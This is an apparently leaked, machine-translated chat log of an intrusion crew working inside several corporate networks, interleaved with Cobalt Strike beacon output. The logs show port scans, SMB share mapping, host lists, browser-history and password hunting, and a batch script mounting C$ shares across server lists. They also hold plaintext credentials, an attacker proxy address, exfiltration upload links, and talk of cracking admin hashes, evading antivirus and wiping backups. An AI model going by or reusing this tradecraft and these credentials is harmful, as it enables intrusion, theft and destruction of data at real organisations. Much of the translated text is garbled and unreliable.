This kind of crap I had in my browser. I tried to go through the proxy; it did not load at all. @user7 but check on our tasklist /v /s; did you download it? No, I was paying special attention to links with "home", and I met paths there? Guys, all information that I downloaded from the machines went to the technicians, I think so. Maybe it's just a rudimentary relic of a bygone era.
```
[*] Tasked beacon to scan ports 135,139,445,80,443,8080,1433 on 192.168.1.0/24
[+] host called home, sent: 93285 bytes
[+] received output:
Scanner module is complete
```
Yeah, let's go portscan it; it can be ping filtered... and also specify + RPC 135,139,445, web ports and SQL. So check all /24.
```
Teemo[WINDC2]SYSTEM */4284|2020Dec24 21:36:28> shell ping gaproc.us.alloypolymers.com -n 1
[*] Tasked beacon to run: ping gaproc.us.alloypolymers.com -n 1
[+] host called home, sent: 68 bytes
[+] received output:

Pinging gaproc.us.alloypolymers.com [192.168.1.121] with 32 bytes of data:
Request timed out.

Ping statistics for 192.168.1.121:
    Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
```
Are you pinging it from the US? khmotskate range. Not pinged (lol))) Seriously, where did you spot it? ipsac local range? Tarao maps pointed the way.))) Is it pinging? The range is scanned; where is it pinged? Where is it pinged from? It's not in the trusts at all, not in AD. In quarantine?
There is also a trust that is not accessed in general. Fuck, interesting. This is no git on the stripped-down Linux? As I understand this is a NAS on the stripped-down Windows? The files are fresh. Sneezy Nordic school) nice guys) Well, there's a glorlocher, will go over it. When it works, everything is fine. Check the record in this dir; udite a screenshot or listing dir with the size of the files. Not always on them disks are shared; there in the settings you can just select a folder where you want to put your backups. Minute, I'm reading here. @tl2 @tl2 call the guru. @tl2 there should be shared disks, although maybe too early to rejoice. Really surprised myself) thanks for telling me to look, otherwise I would have fucked with it for a week.) @tl2 look at it; most likely she had access. Whose keypad is it? What account did you upload? How come you had access the whole time? Although you had access anyway) that's the point, you said yourself look, no viv, and until then we were looking for creds from the web interface. How?
```
Teemo[WINDC2]SYSTEM */4284|2020Dec25 00:32:40> shell net use * \\89.0.10.104\Documents
[*] Tasked beacon to run: net use * \\89.0.10.104\Documents
[+] host called home, sent: 64 bytes
[+] received output:
Drive Z: is now connected to \\89.0.10.104\Documents.

The command completed successfully.

Teemo[WINDC2]SYSTEM */4284|2020Dec25 00:32:53> shell net use
[*] Tasked beacon to run: net use
[+] host called home, sent: 38 bytes
[+] received output:
New connections will be remembered.

Status       Local     Remote                    Network
-------------------------------------------------------------------------------
OK           Z:        \\89.0.10.104\Documents   Microsoft Windows Network
The command completed successfully.
```
Do you have access to the share view?
```
Teemo[WINDC2]SYSTEM */4284|2020Dec25 00:29:28> shell net view \\89.0.10.104 /all
[*] Tasked beacon to run: net view \\89.0.10.104 /all
[+] host called home, sent: 58 bytes
[+] received output:
Shared resources at \\89.0.10.104

nas-D5-E2-B8

Share name  Type  Used as  Comment
-------------------------------------------------------------------------------
Documents   Disk           Document folder
IPC$        IPC            IPC Service ("nas-D5-E2-B8")
Music       Disk           Music folder
Pictures    Disk           Picture folder
Videos      Disk           Video folder
The command completed successfully.
```
No viv on the NAS or what? And give net view \\host /all. Can't find anything related to the NAS. How are you doing?
I found another trust, `gaproc.us.alloypolymers.com`, but it is not available. Solidly. They have been so successful, all on cmd5?
Check the @tl1.
Good night.
Till tomorrow.
The dropsession files in slipk 6. Okay, then tomorrow roll there logins (mail), with clears what is there. Mail sootv from AD, or login accounts. With @tl1, when we worked at ART for a long time, probably a good half of critical accesses came from e-mails that were not on machines there, and network diagrams and instructions on connections and keys and passwords. E-mail is a treasure of information in many companies. He had to go under a proxy on the ADR to be routed to mycr and authorize there, and very often he flies through the mail to the Microsoft site. Do you think he who passed the data on the mail here? There either the pass does not fit, or a box was not created, or an empty mail; not a word about us and the IP and the hostname? In the mail all the clerks checked - empty. You scan on subdomains.
I'm just afraid to use it, after the obvious errors of other tools.) Throw the hashes of all DAs, quickly run them through cmd5. Sobot creds domain https://webmail.rtpcompany.com/owa/auth/logon.aspx, alternative https://exchange.rtpcompany.com/owa/auth/logon.aspx. Above mistake once; disassemble the tool and we will be happy with the search of all mail. @tl1 please, with mailsnapper dig `mail.rtpcompany.com` / `rtpcompany.com`. The computers that I came across offnut, I somewhere saw a link to the domain mail; it must be found. After that, I'll try to connect. Why not get a quick look now, a quick look, not to get into tomorrow during office hours? Did not look there; password mail? I think so, yes, it first did just in case.) But Google the default root pass to port 22 for ReadyNAS; hardly anyone goes there at all on SSH. Just, bros, this is not a full-fledged Linux, it's a nixlike system for NAS. If there are only Linux backups then just shred the server into zeros and fuck it, delete Linux, don't get lost.
Why can't I break it? Just open the SMB share and break it as you please. Go through all available usernames, passwords + all vulnerabilities from the msf - no point in moving it to tomorrow? To try to find the data I need to check every workstation and service cloud. That's a long time.
89.0.1.6:445 (platform: 500 version: 5.0 name: MAINT domain: WORKGROUP)
http://89.0.1.6/rtp/index.cfm
```
Teemo[23L1]TOM/3608|2020Dec24 06:00:28> shell nslookup 89.0.10.104
[*] Tasked beacon to run: nslookup 89.0.10.104
[+] host called home, sent: 51 bytes
[+] received output:
Server:  mndc2.rtpco.local
Address:  89.0.0.83

Name:    nas-D5-E2-B8.rtpco.local
Address:  89.0.10.104
```
```
URL      : https://kaseya.rtpcompany.com/vsapres/web20/core/login.aspx
Username : tom
Password : Passw0rd!
```
Isn't the IP or hostname glowing in the admins' browsers?
```
[+] received output:
89.0.10.104:22 (SSH-2.0-OpenSSH_6.7p1-hpn14v5 Debian-5+deb8u7.netgear1)
```
Did you look for access? No, not in any domain; AD users do not have geodunase. If there are no files on the PC, maybe they did a search on NAS net/ And read the mail of admins?) Guys, we will search for a long time.))) Give me a screenshot of the web admin.
Not Windows?
```
beacon> portscan 89.0.10.104 1-10000 icmp 200
[*] Tasked beacon to scan ports 1-10000 on 89.0.10.104
[+] host called home, sent: 75365 bytes
[+] received output:
(ICMP) Target '89.0.10.104' is alive.
[read 8 bytes]
89.0.10.104:10000
[+] received output:
89.0.10.104:8200
[+] received output:
89.0.10.104:5355
[+] received output:
89.0.10.104:3702
[+] received output:
89.0.10.104:443
[+] received output:
89.0.10.104:139
89.0.10.104:80
[+] received output:
89.0.10.104:22 (SSH-2.0-OpenSSH_6.7p1-hpn14v5 Debian-5+deb8u7.netgear1)
[+] received output:
89.0.10.104:445 (platform: 500 version: 6.1 name: NAS-D5-E2-B8 domain: WORKGROUP)
Scanner module is complete
```
Portscan in progress. Default combinations do not fit. Now give portscan. You guys do not read the messages. When do we start pulling? What will pull the servers, to divide among themselves? You decide what to do there? And this; took this: (platform: 500 version: 6.1 name: NAS-D5-E2-B8 domain: WORKGROUP) didn't come up. DA, LA as local admins. No access to folders on the NAS, or did you try to authorize? No, on the PC admins watched the rg files? Re-checked all the Administrator, did not fit; DA, LA as local admins, and check the web cards, DA / default for this NAS. If no access, then log on 80/443, try to. Strange question))) lock it, need)) access, that is it? LA or DA some? @tl2 what do we do with us? 1) We are not broken into groups of servers. 2) We're in the workstations.
us.alloypolymers.com SERVER ALLOYLICWEB: 10.1.1.238 ALLOYAPP3: 10.1.1.250 RICHMONDDC1: 10.1.1.248 RICHMONDDC2: 10.1.1.247 ALLOYAMMS: 10.1.1.231 GAH2K3SRV1: 10.1.10.40 GAHDC2: 10.1.10.81 ALLOYCRKT01: 10.1.5.250 CROCKETTDC1: 10.1.5.241 ALLOYORGAPP01: 10.1.8.11 ALLOYEXCH02: 10.1.1.240 ORANGEDC1: 10.1.8.248 ALLOYSQL01: 10.1.1.243 ALLOYXENAPP: 10.1.1.237 ALLOYAPP01: 10.1.1.251 RICHMONDSTORAGE: 10.1.1.245 OHPRINTSRV: 10.1.10.12 OHSPICEWORKS: 10.1.10.11 CROCKETTSTORAGE: 10.1.5.242 ALLOYWEB2: 10.1.8.210 GAHDC01: 10.1.10.82 ORANGESTORAGE: 10.1.8.245 ORGPRINTSRV: 10.1.8.246 CTXALLOYCONNECT: 10.1.1.221 ``Just one more time, the avs decided to bypass the inject all ready? rtpco.local SERV AXBATCH-TEST: 10.89.11.112 WINONAV1: 10.89.11.22 AXAOS-BUILD: 10.89.11.120 SAN-HQ: 10.89.11.35 AXDEV3: 10.89.11.103 AXDEV6: 10.89.11.106 MINITABLIC: 10.89.11.6 AXDEV1: 10.89.11.101 AXDEV2: 10.89.11.102 AXSQL-DEV: 10.89.11.118 TX-TESTSRV1: 10.58.0.166 MXSTORAGE: 10.13.0.14 SHENZDC1: 10.17.1.5 NVSTORAGE: 10.57.0.36 NEVADAHYPV1: 10.57.0.84 NVDC1: 10.57.0.32 SUZHOUDC2: 10.7.0.41 SUZHOUPRINTSRV: 10.7.0.21 SINGDC1: 10.5.0.4 SINGDC2: 10.5.0.5 SINGSTORAGE: 10.5.0.19 MNDC2: 89.0.0.81 ``Yes, Captain''. rtpco.local SERV. CTXCONNECTOR2: 10.89.11.27 CTXCONNECTOR1: 10.89.11.26 SQLPROD1: 10.89.0.99 KASEYA: 10.89.11.24 CTXAPP3: 10.89.11.28 ONBASEPROD1: 10.89.11.7 ONBASETEST: 10.89.11.10 CTXAPP4: 10.89.11.11 ONBASETEST01: 10.89.11.33 WEBPROD01: 10.89.11.31 PDM01: 10.89.11.32 SOLARWINDS: 10.89.11.2 WINPAK01: 10.89.0.111 MAINTENANCE: 10.89.11.40 MNDC2: 89.0.0.83 STORAGEWINONA2: 10.89.11.14 AXFORMS-DEV: 10.89.11.111 EXCHANGE: 10.89.11.10 ADMT: 10.89.11.5 INDYDC1: 10.59.0.4 AXREPORTS-DEV: 10.89.11.121 AXAOS-TRAINING: 10.89.11.122 AXAOS-TEST: 10.89.11.123 ``are you ready? 
Checkbomb add /persist? If both show up, then cool add 2 hosts to this ipsa)

```
@echo off
for /f %%i in (ips.txt) do (
    net use * \\%%i\C$ /persistent:yes
)
```

will it do that? or with some batch through the memory can take 100 servers per kobytes which kinda does not interfere in the case of 2fa on avmomo not yet pinging, yes now pinging all domains? total 200 servers? dunno how much interference, I generally quietly walk on their network how much interference? hmm, not a chance to bypass the inmemt in the cloud what is the administrator's browser? 2fa
2. kaseya 3.
Antivirus. Bekapyotnichat then write a list of current problems
there's a splinter it kaseya.rtpcompany.com
there's definitely kasper? There are some problems with kasper, is the rdp port open? The last problem?
on us it is not possible to get to us, it's too early to close so then everything is ready to close if the cresses rolled into the sphere? the first time there? all do proxy) `https://172.22.254.20/` yes, but the stupidity of the face opened it means you came? + without /websso.... at the root, what already toputput in the sphere?
for the future all - always check the test method node and ip and on the hostname
The first thing is to resolve the name of the proxy and then come in proxy can not do it in dnspo ip come in...omgscan ports webana opens (when you come in what does it say?
```
Teemo[MNDC2]SYSTEM */7388|2020Dec24 03:09:47> shell ping vc1.rtpco.local -n 1
[*] Tasked beacon to run: ping vc1.rtpco.local -n 1
[+] host called home, sent: 56 bytes
[+] received output:

Pinging vc1.rtpco.local [172.22.254.20] with 32 bytes of data:
Reply from 172.22.254.20: bytes=32 time<1ms TTL=63

Ping statistics for 172.22.254.20:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms
```
this?
vc1.rtpco.local is dead
```
Teemo[WINDC2]SYSTEM */4284|2020Dec24 03:08:13> shell ping VMWAREMGR -n 1
[*] Tasked beacon to run: ping VMWAREMGR -n 1
[+] host called home, sent: 50 bytes
[+] received output:

Pinging VMWAREMGR.winona.rtpco.local [89.0.55.9] with 32 bytes of data:
Reply from 89.0.0.92: Destination host unreachable.

Ping statistics for 89.0.55.9:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
```
Hosts exist? Judging by the links yes, but to get there does not get + there is even virtualization?
such a question is our rocket) who will get the cunt for the initiative unnecessary?)))) I'm intrigued read the main) tell me) we never get bored
I'm in a fucking funny situation, kz))))) and who held the meeting I do not know ((but did not let me see anything) Target said that the set and some tests are not in the course I have not even seen them
uttut? you didn't happen to check the tests for new candidates?
ok then i'll send them in a separate pack i'm ahtung here again but in a couple of hours i'll be taking my test soon so can you give me yours for pars? Cooke? + do not have to duplicate and you can always consult with me plus I write all sorts of things there are different information flies interesting to work in the general channels remind me to give you tomorrow to roket to online norton and bypass the detector I just did a test so I have no way to parry it i don't think i'm thinking too much now) it's funny how life is so fucked up when no one is thinking about anything it was like this to this day when i used to communicate with the minister
i took it from someone else's cobalt long time ago so right i started noticing crooked listener in other people's cobalt it is RIGHT to write the domain of the pad both in HTTPS hosts and in HTTPS Host (Stager) if you write ipak from HTTPS Host (Stager) - stepping goes "bypassing" SSL certificate which is on the pad - which is FUCKING and adds blocking by phasers
all I see give me the session pass takehq.com
No hedgehog
```
beacon> shell dir "C:\Users\Djarden\AppData\Local\Microsoft\Edge\User Data\Default\History"
[*] Tasked beacon to run: dir "C:\Users\Djarden\AppData\Local\Microsoft\Edge\User Data\Default\History"
[+] host called home, sent: 108 bytes
[+] received output:
The system cannot find the path specified.

beacon> shell dir "C:\Users\Djarden\AppData\Local\Microsoft\Edge\User Data\Default\"
[*] Tasked beacon to run: dir "C:\Users\Djarden\AppData\Local\Microsoft\Edge\User Data\Default\"
[+] host called home, sent: 101 bytes
[+] received output:
The system cannot find the path specified.

beacon> shell dir "C:\Users\Djarden\AppData\Local\Microsoft\Edge\User Data\"
[*] Tasked beacon to run: dir "C:\Users\Djarden\AppData\Local\Microsoft\Edge\User Data\"
[+] host called home, sent: 93 bytes
[+] received output:
The system cannot find the file specified.
```
```
beacon> shell dir "C:\Users\Djarden\AppData\Local\Microsoft\Edge\"
[*] Tasked beacon to run: dir "C:\Users\Djarden\AppData\Local\Microsoft\Edge\"
[+] host called home, sent: 83 bytes
[+] received output:
 Volume in drive C has no label.
 Volume Serial Number is D0FC-5A15

 Directory of C:\Users\Djarden\AppData\Local\Microsoft\Edge

08/05/2019  07:05 AM    <DIR>          .
08/05/2019  07:05 AM    <DIR>          ..
               0 File(s)              0 bytes
               2 Dir(s)  24,238,346,240 bytes free
```
at least give me a sign of life (no session)
`c:\users\USERNAME\AppData\Local\Microsoft\Edge\User Data\Default\History`
```
 Directory of C:\Users\Djarden\AppData\Local\MicrosoftEdge\User\Default

01/26/2017  10:24 AM    <DIR>          .
01/26/2017  10:24 AM    <DIR>          ..
               0 File(s)              0 bytes
               2 Dir(s)  24,248,209,408 bytes free
```
```
 Directory of C:\Users\Djarden\AppData\Local\Microsoft\Edge

08/05/2019  07:05 AM    <DIR>          .
08/05/2019  07:05 AM    <DIR>          ..
               0 File(s)              0 bytes
               2 Dir(s)  24,254,611,456 bytes free
```
```
 Directory of C:\Users\Djarden\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge

02/03/2017  08:42 AM    <DIR>          .
02/03/2017  08:42 AM    <DIR>          ..
01/26/2017  09:48 AM    <DIR>          CortanaAssist
02/03/2017  08:42 AM    <DIR>          Extensions
01/26/2017  09:46 AM    <DIR>          PlayReady
01/30/2019  01:13 PM    <DIR>          UrlBlock
01/26/2017  09:46 AM    <DIR>          User
               0 File(s)              0 bytes
               7 Dir(s)  24,243,003,392 bytes free
```
```
 Directory of C:\Users\Djarden\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default

04/26/2017  09:01 AM    <DIR>          .
04/26/2017  09:01 AM    <DIR>          ..
04/26/2017  09:01 AM    <DIR>          BrowserImport
01/15/2021  01:13 PM    <DIR>          DataStore
01/22/2018  10:23 AM    <DIR>          DomainSuggestions
01/26/2017  09:46 AM    <DIR>          Favorites
01/26/2017  09:46 AM    <DIR>          ImageStore
09/10/2020  03:38 PM    <DIR>          RACShare
08/28/2017  01:01 PM    <DIR>          Recovery
               0 File(s)              0 bytes
               9 Dir(s)  24,242,847,744 bytes free
```
```
 Directory of C:\Users\Djarden\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\History
File Not Found
```
Ah, yes, I switched servers
takehq.com give me a passport session i asked to leave for the mail
why did you put out the socks?)
not a folder there history file should lie hezh? 1 megabyte ff there and chrome
and go to the ortn try it yourself pick me pliz history file
i do not believe that not dumped, yes it does not have a fox?
I don't know if it's a good idea to get it from her.
Error when opening the archive-rezip
Symantec Endpoint Protection
Kaspersky Endpoint Security 10 for Windows
And some https://www.kaseya.com
What's in the hedgehog, if sharpweb is dead, I check the files in gkeller\g$ so what's in the hedgehog?
Check out chrome, the hedgehog and the hedgehog didn't check out
so I downloaded the profile of the ff and the browsers from it?
File Not Found
File Guess What
Volume in drive C is Windows
Volume Serial Number is A6E5-1986
Do then `dir C:\users\*.rdg /s`
is not there this password has a session? I also asked to see the rdp there from-guess user and taka and what about the taka user from what taka? or sharpChrome? it's from where? i see it's just there, i can't see the password
let me try there's a saved password i'll tell you more
last time bingo was in the history ff, guess where did bingo know?
```
49655 https://infosight.hpe.com/app/login HPE InfoSight | Hewlett Packard Enterprise 1 0 13250782013357001
```
watch the admins on the rdp interesting
I by the way the web port does not work there 127.0.1.1:3389 127.0.1.1:445 maybe it's true....
keep all mail accesses nearby to clean up the alerts if we find nimble accesses
by the way i figured it was a redirect to 127.0.0.1 noticed this message long time ago when i was going through the mail using the word nimble so i fucked up my time :
```
beacon> shell ping -a 127.0.1.1
[*] Tasked beacon to run: ping -a 127.0.1.1
[+] host called home, sent: 48 bytes
[+] received output:

Pinging 127.0.1.1 with 32 bytes of data:
Reply from 127.0.1.1: bytes=32 time<1ms TTL=128
Reply from 127.0.1.1: bytes=32 time<1ms TTL=128
Reply from 127.0.1.1: bytes=32 time<1ms TTL=128
Reply from 127.0.1.1: bytes=32 time<1ms TTL=128

Ping statistics for 127.0.1.1:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms

beacon> shell nslookup 127.0.1.1
[*] Tasked beacon to run: nslookup 127.0.1.1
[+] host called home, sent: 49 bytes
[+] received output:
*** wwdc2.waterway.com can't find 127.0.1.1: Non-existent domain
Server:  wwdc2.waterway.com
Address:  192.168.0.222
```
and the other 50% is another way is 50%
take into account the fact that they maybe just badly configured it can immediately nslookup
no, it's a chip. last logon write during login) pinging from the network 127.0.1.1 is a service crap for spam mail tact "with itself" is not 127.0.0. so for ssh would be third-party ip, like, they go there(?) well ssh isa127.0.1.1.1 there is writing root login from
if you mean what I wrote above in meaning? just smssochki strange-nimble, where is that there? rd port open?
tell me on the request for password while i see that they complain "i forgot my password from my kankuntemr((( "
and here rakspeyspro nimbly here are samesochki
come on the desktop nothing interesting?
```
netstat /p tcp /a | findstr 3389
```
anything on the desktop?
Look where the rdp opens in the ff, nothing interesting
did you check this e-mail? that's how we haven't found it yet they seem to have a vendor database with this kind of access
I'll take a look, while you take off the chrome and explore the car, I see he has a FF thank you
Give me an admin account for the token
0:00:00 svchost.exe 18788 Services 0 15,468 K NT AUTHORITY\LOCAL SERVICE 0:00:00 SettingSyncHost.exe 25812 RDP-Tcp#2 2 6,176 K WATERWAY\mapusatera 0:00:00 svchost.exe 10760 Services 0 11,264 K NT AUTHORITY\SYSTEM 0:00:00 WmiPrvSE.exe 21536 Services 0 10,624 K NT AUTHORITY\SYSTEM 0:00:00 svchost.exe 12976 Services 0 20,216 K NT AUTHORITY\SYSTEM 0:00:00 devenv.exe 21676 RDP-Tcp#2 2,505,908 K WATERWAY\mapusatera 0:00:40 PerfWatson2.exe 1648 RDP-Tcp#2 2 70,476 K WATERWAY\mapusatera 0:00:02 Microsoft.ServiceHub.Cont 3392 RDP-Tcp#2 2 57,436 K WATERWAY\mapusatera 0:00:01 conhost.exe 5328 RDP-Tcp#2 2 10,772 K WATERWAY\mapusatera 0:00:00 ServiceHub.VSDetouredHost 6328 RDP-Tcp#2 2 80,500 K WATERWAY\mapusatera 0:00:03 ServiceHub.IdentityHost.e 22516 RDP-Tcp#2 2 99,428 K WATERWAY\mapusatera 0:00:05 conhost.exe 23400 RDP-Tcp#2 2 2 10,752 K WATERWAY\mapusatera 0:00:00 conhost.exe 22260 RDP-Tcp#2 2 10,744 K WATERWAY\mapusatera 0:00:00 ServiceHub.SettingsHost.e 3612 RDP-Tcp#2 2 111,168 K WATERWAY\mapusatera 0:00:03 conhost.exe 23096 RDP-Tcp#2 2 2 10,772 K WATERWAY\mapusatera 0:00:00 ServiceHub.Host.CLR.x86.e 3112 RDP-Tcp#2 2 62,536 K WATERWAY\mapusatera 0:00:01 conhost.exe 2992 RDP-Tcp#2 2 2 10,748 K WATERWAY\mapusatera 0:00:00 ServiceHub.RoslynCodeAnal 19432 RDP-Tcp#2 2 295,244 K WATERWAY\mapusatera 0:00:11 conhost.exe 19164 RDP-Tcp#2 2 10,752 K WATERWAY\mapusatera 0:00:00 ServiceHub.ThreadedWaitDi 18648 RDP-Tcp#2 2 71,792 K WATERWAY\mapusatera 0:00:02 conhost.exe 8992 RDP-Tcp#2 2 10,764 K WATERWAY\mapusatera 0:00:00 sqlservr.exe 2800 RDP-Tcp#2 2,381,244 K WATERWAY\mapusatera 0:00:10 ServiceHub.Host.CLR.x86.e 24636 RDP-Tcp#2 2 83,308 K WATERWAY\mapusatera 0:00:03 conhost.exe 24708 RDP-Tcp#2 2 2 10,760 K WATERWAY\mapusatera 0:00:00 ServiceHub.TestWindowStor 15700 RDP-Tcp#2 2 2 63,176 K WATERWAY\mapusatera 0:00:01 conhost.exe 10360 RDP-Tcp#2 2 2 10,776 K WATERWAY\mapusatera 0:00:00 ServiceHub.Host.CLR.x86.e 20912 RDP-Tcp#2 2 63,996 K WATERWAY\mapusatera 0:00:01 conhost.exe 4388 
RDP-Tcp#2 2 2 10,752 K WATERWAY\mapusatera 0:00:00 chrome.exe 22888 RDP-Tcp#2 2 120,740 K WATERWAY\mapusatera 0:00:12 chrome.exe 23436 RDP-Tcp#2 2,123,468 K WATERWAY\mapusatera 0:00:08 chrome.exe 23980 RDP-Tcp#2 2,101,556 K WATERWAY\mapusatera 0:00:03 chrome.exe 24536 RDP-Tcp#2 2 2 95,496 K WATERWAY\mapusatera 0:00:02 chrome.exe 18072 RDP-Tcp#2 2 2,424 K WATERWAY\mapusatera 0:00:04 devenv.exe 17440 RDP-Tcp#2 2 548,328 K WATERWAY\mapusatera 0:01:08 PerfWatson2.exe 19876 RDP-Tcp#2 2 66,292 K WATERWAY\mapusatera 0:00:01 Microsoft.ServiceHub.Cont 3400 RDP-Tcp#2 2 2 55,544 K WATERWAY\mapusatera 0:00:01 conhost.exe 3436 RDP-Tcp#2 2 2 10,748 K WATERWAY\mapusatera 0:00:00 ServiceHub.VSDetouredHost 24196 RDP-Tcp#2 2 80,520 K WATERWAY\mapusatera 0:00:03 ServiceHub.IdentityHost.e 17652 RDP-Tcp#2 2 96,368 K WATERWAY\mapusatera 0:00:05 conhost.exe 19700 RDP-Tcp#2 2 2 10,760 K WATERWAY\mapusatera 0:00:00 conhost.exe 13384 RDP-Tcp#2 2 10,740 K WATERWAY\mapusatera 0:00:00 ServiceHub.RoslynCodeAnal 14756 RDP-Tcp#2 2 271,108 K WATERWAY\mapusatera 0:00:07 conhost.exe 9688 RDP-Tcp#2 2 10,760 K WATERWAY\mapusatera 0:00:00 ServiceHub.ThreadedWaitDi 20588 RDP-Tcp#2 2 71,472 K WATERWAY\mapusatera 0:00:01 conhost.exe 8224 RDP-Tcp#2 2 2 10,748 K WATERWAY\mapusatera 0:00:00 ServiceHub.Host.CLR.x86.e 22956 RDP-Tcp#2 2 2 61,828 K WATERWAY\mapusatera 0:00:01 conhost.exe 13400 RDP-Tcp#2 2 2 10,732 K WATERWAY\mapusatera 0:00:00 ServiceHub.SettingsHost.e 23348 RDP-Tcp#2 2 113,756 K WATERWAY\mapusatera 0:00:07 conhost.exe 25440 RDP-Tcp#2 2 2 10,732 K WATERWAY\mapusatera 0:00:00 ServiceHub.Host.CLR.x86.e 18560 RDP-Tcp#2 2 57,704 K WATERWAY\mapusatera 0:00:01 conhost.exe 11608 RDP-Tcp#2 2 2 10,732 K WATERWAY\mapusatera 0:00:00 svchost.exe 26356 Services 0 7,628 K NT AUTHORITY\SYSTEM 0:00:00 ScriptedSandbox64.exe 4112 RDP-Tcp#2 2 43,492 K WATERWAY\mapusatera 0:00:00 WmiPrvSE.exe 23456 Services 0 15,020 K NT AUTHORITY\NETWORK SERVICE 0:00:04 chrome.exe 21960 RDP-Tcp#2 2 23,100 K WATERWAY\mapusatera 
``Give me a list of processes 192.168.0.164 I'd like to see his car,`` for now,`` I don't have a car in coba,`` have you looked exactly,`` I think the post office has looked at something else or his mail,`` >memberOf: CN=Veeam Admins,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com >memberOf: CN=Senior Ops,OU=WWW2K Security,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com >memberOf: CN=IT,OU=WW2K Security,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com >memberOf: CN=Hyper-V Admins,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com >memberOf: CN=Nimble Admins,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com >memberOf: CN=ITStaff,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com >memberOf: CN=Office,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com >memberOf: CN=OfficeSQL,OU=SQLGroups,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com >memberOf: CN=OnlyOffice,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com >memberOf: CN=Schema Admins,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com >memberOf: CN=Enterprise Admins,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com >memberOf: CN=Domain Admins,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com Do you have it? mapusatera atam also not saved even on the rd went to someone I do not remember someone exactly had and the rest do not mention nimbla in the stories? even somharper or with blauer? with gkellera who do you work with?
If request for credits from the browser and 7za.exe spam such processes, then maybe it's our doing?
The last time he visited this URL was on October 20th. I don't think they're that worried that only one person + no, also blank forms, I'll try to see if he has a LastPass in Chrome and no password? blauer also or did you only take Chrome from them and no one else in the history? by the way about other italian people in this network only problem with nimbla is chic i still have 2 creds with access to it 192.168.0.3 Waterway 11915Wnas2179! ``That's what you found,`` isn't it? http://192.168.0.3:5000/ WW99NAS - Synology DiskStation ``From the premium pornhub I wish I'd gotten it in some kind of grid and the credits from steem, league of legends and minecraft. 388 https://www.dragonawaken.com 40 389 http://www.9minecraft.net 100 ``There's a different process to put? + he has 4 monitors there or what)`` clearly writes SQL query and here lke = like `re ea lke c'[F5]` `` it seems to me that he has a different layout or koba trojit?
SQLQuery4.sql - wwng-prod.database.windows.net.WWNG (wwng-admin (82))* - Microsoft SQL Server Management Studio ======= re ea lke c'[F5] SQLQuery3.sql - wwng-prod.database.windows.net.WWNG (wwng-admin (80))* - Microsoft SQL Server Management Studio ======= hee si[tab][control] Waterway IT - Agent - Mozilla Firefox ======= , h,.isom frmv. Plseley e no .cel i [backspace]oul bsbe[backspace][backspace][backspace][backspace][backspace][backspace]s odpo e ``Turn off the juice of one of them, let it browse further while it's on the monitor`` Waterway IT - Agent - Mozilla Firefox ======= Ry, ee et ac tntkwif re shi el eed ``He's writing something in Tuvan there, I've only put the logbook there to help) .)) .no, the nimble address of the car itself? setg Proxies socks4:209.222.97.8:5543 ``and ip adr to log in sock from his tachka + password is the same? https://www.sendspace.com/file/dudf68 not fully uploaded the archive that by the way was normal? yes i would be glad to fill me a normal archive) in the browser cleanly not to watch the control panel dkmen and watched vidosikon came at the most inopportune moment if that here http://www.howtogeek.com/679085/how-to-view-a-saved-password-in-firefox/ come on, by rdp went? can not open the file as archive `tghiWERm4234A` https://qaz.im/load/f3hhRs/zB3ahS upload here qaz.im and encrypt the file names under the password here you will endlessly upload to a third-party resource increase the size of files + upload me a profile and by rd there check idletime did not work alright just make a backup of yours you need to delete your files and upload it in the current profile of your browser, then rndno i must have uploaded to the profiles folder downloaded profile no profile?
there is a folder let's take the folder away then we can also take the folder away yes ====== IdleTime ====== CurrentUser : WATERWAY\mharper Idletime : 07h:54m:42s:515ms (28482515 milliseconds) ``check his idletime and on rdp)`` why? I downloaded the folder with the profile ffrebut just rebooted? computer off? it looks like the computer rebooted from the network did not throw out? ping servers and all ready did not find the total for hell 1726 160 servers 1550 armies 16 eksha,nasa,linpoka nothing,1 subnet only scanned vg have what? + on the backup server hangs the cloud service process, but on rdp under another user does not see any settings that backups go to the cloud - all other settings backups are visible. Maybe it's just service hanging, but they're not using it. As they are gone, you can check on the rdp ``` Veeam.Backup.CloudService 4676 Services 0 209,772 K VEEAM01\Administrator 0:03:16 ``Backups - vm and filestores ``macaffi server ``great) in the center ``Domain Admins
``C:\projects\default\temp BBCTX6 @ MAPCIASP\bbbwalkerj @sleep don't forget to kill the session Kerb removal, sent T2snap don't forget to clean files @help @sleep all native commands go through @link to the module for the nativity and the desired yousej How to write? Describe how it should work? I will create a request to add in the personal where to write?
and do not load modules from the guitar write more simply that I would like to add as nativman on tpsh is unlikely to be at the top I have no white background) black Zmek there you will see a box PAYLOAD Writes on the top left in white on a white background a bug interface it is Need a man on this TPS and the ability to create the load in tpsh threw the session immediately progress went what the day did` ``
